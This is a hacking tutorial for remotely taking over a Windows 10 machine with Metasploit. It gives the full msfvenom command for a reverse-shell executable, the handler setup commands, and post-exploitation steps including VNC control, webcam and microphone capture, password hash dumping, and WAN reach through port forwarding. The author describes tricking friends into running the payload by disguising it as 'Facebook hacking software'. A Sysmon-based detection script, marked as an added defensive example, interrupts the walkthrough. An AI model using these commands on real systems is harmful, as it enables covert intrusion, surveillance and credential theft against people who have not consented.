Steps and Instructions -
Today we will be hacking Windows 10 using Metasploit.
We will also do some basic post exploitation.
* Kali Linux
Some terms -
Payload - the file that is run on the target system to make a reverse TCP connection back to our machine.
Let's do it...
I am running two machines. One is Windows 10 and another is Kali Linux.
* First we will make a payload using msfvenom.
We will open a terminal and type in
"msfvenom -p windows/meterpreter_reverse_tcp --platform windows -a x86 -f exe LHOST=(your IP) LPORT=4444 -o /root/Desktop/monks.exe"
Here -p selects the payload,
--platform windows and -a x86 select the target platform and architecture,
-f exe sets the output format (a Windows executable),
LHOST should be your IP address and LPORT is the port your handler will listen on,
/root/Desktop is the path where the file is saved, and
monks.exe is the name of the payload.
This will take some time to make the payload.
You can do this hack without a payload, but we will cover that in the next tutorial. Note that the payload is only used to make the reverse TCP connection.
When you hit enter, you will get a message, as in the snapshot above, saying "No encoder or badchars specified, outputting raw payload".
That is fine as long as the payload has a non-zero size (here 957487 bytes). Make sure that the payload is not empty.
Your payload should now be on the Desktop.
Now is the time to launch Metasploit.
* Open a terminal and type "msfconsole". This will give us a console to set up our handler.
To set it up we go through a series of commands:
"use exploit/multi/handler"
"set payload windows/meterpreter_reverse_tcp"
"set LHOST (your IP)"
"set LPORT 4444"
"exploit"
After the setup, when we run exploit, the handler waits while it says "starting the payload handler".
That's because the payload has to be placed on the target system and the target has to double-click it before a connection comes back.
Here you have to use your social engineering skills to get the payload onto the target system. For example, I found this cool way where I uploaded the payload to MediaFire and told my friends that it was Facebook hacking software. As expected, they downloaded it and tried to run it.
How you get them to execute it is up to you.
For now I will go to my Windows 10 machine and double-click on it.
And when I come back to my Kali machine,
it says that we have an open session.
(Most people get stuck at "starting the payload handler....".
There are several reasons to get stuck at this point. Stick to the end to read about troubleshooting.)
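From the defender's side, the callback described above (an exe double-clicked from the Desktop opening an outbound TCP connection to the handler's LPORT) is exactly what endpoint telemetry should catch. The following is an added example, not part of this tutorial: it scans constructed Sysmon-style network-connection records (field names assumed to follow Sysmon Event ID 3) and flags connections to the tutorial's port 4444 or from a process running out of a user-writable directory.

```python
import json
from typing import Iterable

# Constructed Sysmon-style network-connection events (Event ID 3), not real telemetry.
# The first record mirrors this tutorial: an exe double-clicked from the Desktop
# opening an outbound TCP connection to the handler's LPORT 4444.
SAMPLE_EVENTS = [
    r'{"EventID":3,"Image":"C:\\Users\\bob\\Desktop\\monks.exe","User":"PC\\bob","DestinationIp":"192.168.56.101","DestinationPort":4444,"Initiated":"true"}',
    r'{"EventID":3,"Image":"C:\\Program Files\\Mozilla Firefox\\firefox.exe","User":"PC\\bob","DestinationIp":"93.184.216.34","DestinationPort":443,"Initiated":"true"}',
    r'{"EventID":1,"Image":"C:\\Users\\bob\\Downloads\\setup.exe","User":"PC\\bob"}',
    r'{"EventID":3,"Image":"C:\\Users\\bob\\Downloads\\tool.exe","User":"PC\\bob","DestinationIp":"10.0.0.5","DestinationPort":8080,"Initiated":"true"}',
]

# The tutorial's LPORT. An attacker can pick any port, so this is a cheap first
# signal to combine with the path check below, not a detection on its own.
DEFAULT_HANDLER_PORTS = {4444}

# Directories a user can write to without admin rights: where a downloaded
# "Facebook hacking software" lands before it is double-clicked.
USER_WRITABLE_MARKERS = ("\\desktop\\", "\\downloads\\", "\\appdata\\local\\temp\\")


def analyse_event(raw: str) -> list[str]:
    """Return the reasons an event looks like a reverse-shell callback (empty if none)."""
    ev = json.loads(raw)
    if ev.get("EventID") != 3 or ev.get("Initiated") != "true":
        return []  # only outbound connections initiated by a local process matter here
    reasons = []
    if int(ev.get("DestinationPort", 0)) in DEFAULT_HANDLER_PORTS:
        reasons.append("destination port is a default Metasploit handler port")
    if any(marker in ev.get("Image", "").lower() for marker in USER_WRITABLE_MARKERS):
        reasons.append("process image runs from a user-writable directory")
    return reasons


def scan(events: Iterable[str]) -> list[dict]:
    """One finding per suspicious event: the image, the peer it called and why."""
    findings = []
    for raw in events:
        reasons = analyse_event(raw)
        if reasons:
            ev = json.loads(raw)
            peer = f'{ev["DestinationIp"]}:{ev["DestinationPort"]}'
            findings.append({"image": ev["Image"], "peer": peer, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f["image"], "->", f["peer"], "|", "; ".join(f["reasons"]))
```

Real deployments would baseline normal egress per host and add the process's parent (explorer.exe launching an exe from Downloads) as a further signal.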
OK. Now comes the post exploitation part.
We can run VNC to get a live view of and control over the target's desktop.
* type "run vnc"
Just a tip, guys: if you are running in VMware, don't do VNC. It will show you something like this.
As you can see, it is totally fucked up.
That's because it will show us the target machine, which is the physical host running the VMware machine, so you get a mirror effect.
We can use commands like:
"getuid" to show which user the session is running as
"sysinfo" for the target's specs
"run post/windows/gather/checkvm" to find out whether the target is physical or virtual
"run post/windows/gather/enum_applications" to list the applications installed on the target machine
Here is the list of programs found.
We can look at the help menu by typing "help".
You will get lots of options, like the ones here for webcams.
Here you can record the mic, chat over the webcam, take snapshots or stream it live.
You can dump the password hashes from the SAM database.
There are lots of options for post exploitation.
I have done it on a LAN. But if you wish to do it over the WAN, you have to set up port forwarding on your router and listen on that open port.
Troubleshoot it -
If your handler halts after "starting the payload handler....",
there can be many reasons, like:
* The target has not clicked on the payload and run it.
* You are doing it on VMware, where the payload doesn't work on a few operating systems.
I used to have this same problem when I had VMware running on Win 8. It didn't have a VM0 adapter in the VMware function. That will not let you connect via a reverse TCP connection.
* You are doing it over the WAN. That is complicated.
Thank you, guys, for reading this tutorial.
You may want to see my other tutorials on Metasploit-